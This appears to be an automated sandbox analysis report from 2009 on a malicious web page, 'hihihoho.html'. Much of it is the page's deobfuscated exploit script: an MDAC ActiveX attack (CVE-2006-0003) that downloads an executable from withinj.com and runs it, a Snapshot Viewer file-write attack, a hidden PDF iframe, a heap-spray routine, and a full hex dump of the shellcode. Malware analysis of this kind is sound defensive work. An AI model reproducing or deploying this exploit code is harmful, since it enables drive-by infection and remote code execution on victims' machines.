Analysis report for hihihoho.html
Sample Overview
| File | hihihoho.html |
|---|---|
| MD5 | 4e035b98a661215b740237b2a2d0a26b |
| Analysis Started | 2009-01-13 04:35:04 |
| Report Generated | 2009-01-13 04:35:08 |
| Jsand version | 1.03.02 |
Detection results
| Detector | Result |
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
| MDAC | Arbitrary file download via the Microsoft Data Access Components (MDAC) | CVE-2006-0003 |
Deobfuscation results
Evals
PEELt6.ShellExecute(Frogxa);
(repeated 1 time)
Writes
e8 % uaaec % udccb % ubc34 % u10bc" +
" % ucf9a % ubcbf % uaa64 % u85f3 % ub6ea % uba64 %
u07f7 % uefcc % uefef % uef85 % u9a10 % u64cf % ue7aa % ued85 % u64b6 % uf7ba" +
" % uff07
% uefef % u85ef % u6410 % uffaa % uee85 % u64b6 % uf7ba % uef07 % uefef % uaeef % ubdb4 %
u0eec % u0eec % u0eec % u0eec" +
" % u036c % ub5eb % u64bc % u0d35 % ubd18 % u0f10 % u64ba
% u6403 % ue792 % ub264 % ub9e3 % u9c64 % u64d3 % uf19b % uec97 % ub91c" +
" % u9964 %
ueccf % udc1c % ua626 % u42ae % u2cec % udcb9 % ue019 % uff51 % u1dd5 % ue79b % u212e %
uece2 % uaf1d % u1e04 % u11d4" +
" % u9ab1 % ub50a % u0464 % ub564 % ueccb % u8932 % ue364
% u64a4 % uf3b5 % u32ec % ueb64 % uec64 % ub12a % u2db2 % uefe7 % u1b07" +
" % u1011 %
uba10 % ua3bd % ua0a2 % uefa1 % u7468 % u7074 % u2F3A % u772F % u7469 % u6968 % u6A6E %
u632E % u6D6F % u732F % u6174 % u2F74 % u7865 % u2E65 % u6870 % u0070
");
var psrayt = unescape(" % u0a0a % u0a0a");
do {
psrayt += psrayt;
}
while (psrayt.length < 0xd
(repeated 1 time)
0000);
meray = new Array();
for(i = 0; i < 100; i++)
meray[i] = psrayt + srtkod;
xmlcode =
"<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATA
SRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SP
AN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
}
if (MDAC()||PDF()|
|WML()||SS()) { }
</script>
(repeated 1 time)
div > ');
var srtkod = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" + "
%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03
%uefeb" + "
%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66
%ub9e7" + "
%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87
%u0a96" + "
%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa
%uee85" + "
%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf
%ucfaa" + "
%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a
%uebaf" + " % u8a97 % uefef % u9a10 % u64cf % ue3aa % uee85 % u64b6 % uf7ba % uaf07 %
uefef % u85ef % ub7
(repeated 1 time)
<SCRIPT language="javascript">
var p_url = "http://withinj.com/stat/exe.php";
function MDAC(){
var nuc='';
d8= 0;
var qbh5gVJ = document.createElement("obje"+nuc+"ct");
qbh5gVJ.setAttribute("id","<?=qb"+nuc+"h5gVJ?>");
qbh5gVJ.setAttribute("c"+nuc+"la"+nuc+"ssi"+nuc+"d","clsid:BD"+nuc+"96C556-65A3-11D"+nuc+"0-983A-"+nuc+"0"+nuc+"0C0"+nuc+"4FC29E36");
try{
var XonDqs = qbh5gVJ.CreateObject("a"+nuc+"do"+nuc+"d"+nuc+"b.st"+nuc+"ream",'');
var d8 = 1;
}catch(e){}
try{
var PEELt6 = qbh5gVJ.CreateObject("Shell.Ap"+nuc+"pl"+nuc+"ica"+nuc+"tion",'');
var d8 = 1;
}
catch(e){}
if(d8 == 1)
{
try
{
var Ebe09i = qbh5gVJ.CreateObject("msxml2"+nuc+".XMLHTTP",'');
Ebe09i.open("G"+nuc+"ET",p_url,false);
Ebe09i.send();
XonDqs.typ
(repeated 1 time)
e = 1;
XonDqs.open();
XonDqs.Write(Ebe09i.responseBody);
Frogxa = "..\\S87ekhV.exe";
XonDqs.Save
ToFile(Frogxa,2);
eval("PEELt6.Sh"+nuc+"ellEx"+nuc+"ecute(Fr"+nuc+"ogxa);");
return 1;
}
catch(e){}
}
}
function PDF()
{
document.write('<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"
></iframe>
');
}
function SS()
{
var arbitrary_file = p_url;
var dest = 'C:/Program Files/Outlook Express/wab.e
xe';
document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'>
</object>
");
attack.SnapshotPath = arbitrary_file;
setTimeout('window.location = "ldap://127.0.0.1"',2000);
a
ttack.CompressedPath = dest;
attack.PrintSnapshot(arbitrary_file,dest);
}
function WML()
{
document.
write('<div id="replace">x</
(repeated 1 time)
<iframe src="spl/pdf.pdf" width=1 height=1 style="display:none"></iframe>
(repeated 1 time)
<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>
(repeated 1 time)
<div id="replace">x</div>
(repeated 1 time)
Network Requests
| URL | Status |
| http://www.cs.ucsb.edu/~marco/jsan/unknown | 200 |
Redirects
No redirects.
ActiveX controls
-
**BD96C556-65A3-11D0-983A-00C04FC29E36**

Methods

| Name | Arg0 | Arg1 | Count |
|---|---|---|---|
| CreateObject | msxml2.XMLHTTP | '' | 1 |
| CreateObject | Shell.Application | '' | 1 |
| CreateObject | adodb.stream | '' | 1 |

Attributes

| Name | Value | Count |
|---|---|---|
| id | <?=qbh5gVJ?> | 1 |
-
**ADODB.STREAM**

Methods

| Name | Arg0 | Arg1 | Count |
|---|---|---|---|
| Write | (undefined) | | 1 |
| SaveToFile | ..\S87ekhV.exe | 2.0 | 1 |
| open | | | 1 |

Attributes

| Name | Value | Count |
|---|---|---|
| type | 1.0 | 1 |
-
**SHELL.APPLICATION**

Methods

| Name | Arg0 | Count |
|---|---|---|
| ShellExecute | ..\S87ekhV.exe | 1 |
-
**MSXML2.XMLHTTP**

Methods

| Name | Arg0 | Arg1 | Arg2 | Count |
|---|---|---|---|---|
| open | GET | http://withinj.com/stat/exe.php | false | 1 |
| send | | | | 1 |
Shellcode and Malware
| Hexadecimal | ASCII |
43 43 43 43 eb 0f 5b 33 c9 66 b9 80 01 80 33 ef
43 e2 fa eb 05 e8 ec ff ff ff 7f 8b 4e df ef ef
ef 64 af e3 64 9f f3 42 64 9f e7 6e 03 ef eb ef
ef 64 03 b9 87 61 a1 e1 03 07 11 ef ef ef 66 aa
eb b9 87 77 11 65 e1 07 1f ef ef ef 66 aa e7 b9
87 ca 5f 10 2d 07 0d ef ef ef 66 aa e3 b9 87 00
21 0f 8f 07 3b ef ef ef 66 aa ff b9 87 2e 96 0a
57 07 29 ef ef ef 66 aa fb af 6f d7 2c 9a 15 66
aa f7 06 e8 ee ef ef b1 66 9a cb 64 aa eb 85 ee
b6 64 ba f7 b9 07 64 ef ef ef bf 87 d9 f5 c0 9f
07 78 ef ef ef 66 aa f3 64 2a 6c 2f bf 66 aa cf
87 10 ef ef ef bf 64 aa fb 85 ed b6 64 ba f7 07
8e ef ef ef ec aa cf 28 ef b3 91 c1 8a 28 af eb
97 8a ef ef 10 9a cf 64 aa e3 85 ee b6 64 ba f7
07 af ef ef ef 85 e8 b7 ec aa cb dc 34 bc bc 10
9a cf bf bc 64 aa f3 85 ea b6 64 ba f7 07 cc ef
ef ef 85 ef 10 9a cf 64 aa e7 85 ed b6 64 ba f7
07 ff ef ef ef 85 10 64 aa ff 85 ee b6 64 ba f7
07 ef ef ef ef ae b4 bd ec 0e ec 0e ec 0e ec 0e
6c 03 eb b5 bc 64 35 0d 18 bd 10 0f ba 64 03 64
92 e7 64 b2 e3 b9 64 9c d3 64 9b f1 97 ec 1c b9
64 99 cf ec 1c dc 26 a6 ae 42 ec 2c b9 dc 19 e0
51 ff d5 1d 9b e7 2e 21 e2 ec 1d af 04 1e d4 11
b1 9a 0a b5 64 04 64 b5 cb ec 32 89 64 e3 a4 64
b5 f3 ec 32 64 eb 64 ec 2a b1 b2 2d e7 ef 07 1b
11 10 10 ba bd a3 a2 a0 a1 ef 68 74 74 70 3a 2f
2f 77 69 74 68 69 6e 6a 2e 63 6f 6d 2f 73 74 61
74 2f 65 78 65 2e 70 68 70 00 | CCCC..[3.f....3.
C...........N...
.d..d..Bd..n....
.d...a........f.
...w.e......f...
.._.-.....f.....
!...;...f.......
W.)...f...o.,..f
........f..d....
.d....d.........
.x...f..d*l/.f..
......d.....d...
.......(.....(..
.......d.....d..
............4...
....d.....d.....
.......d.....d..
.......d.....d..
................
l....d5......d.d
..d...d..d......
d.....&..B.,....
Q......!........
....d.d...2.d..d
...2d.d.*..-....
..........http:/
/withinj.com/sta
t/exe.php. |
No additional malware was retrieved.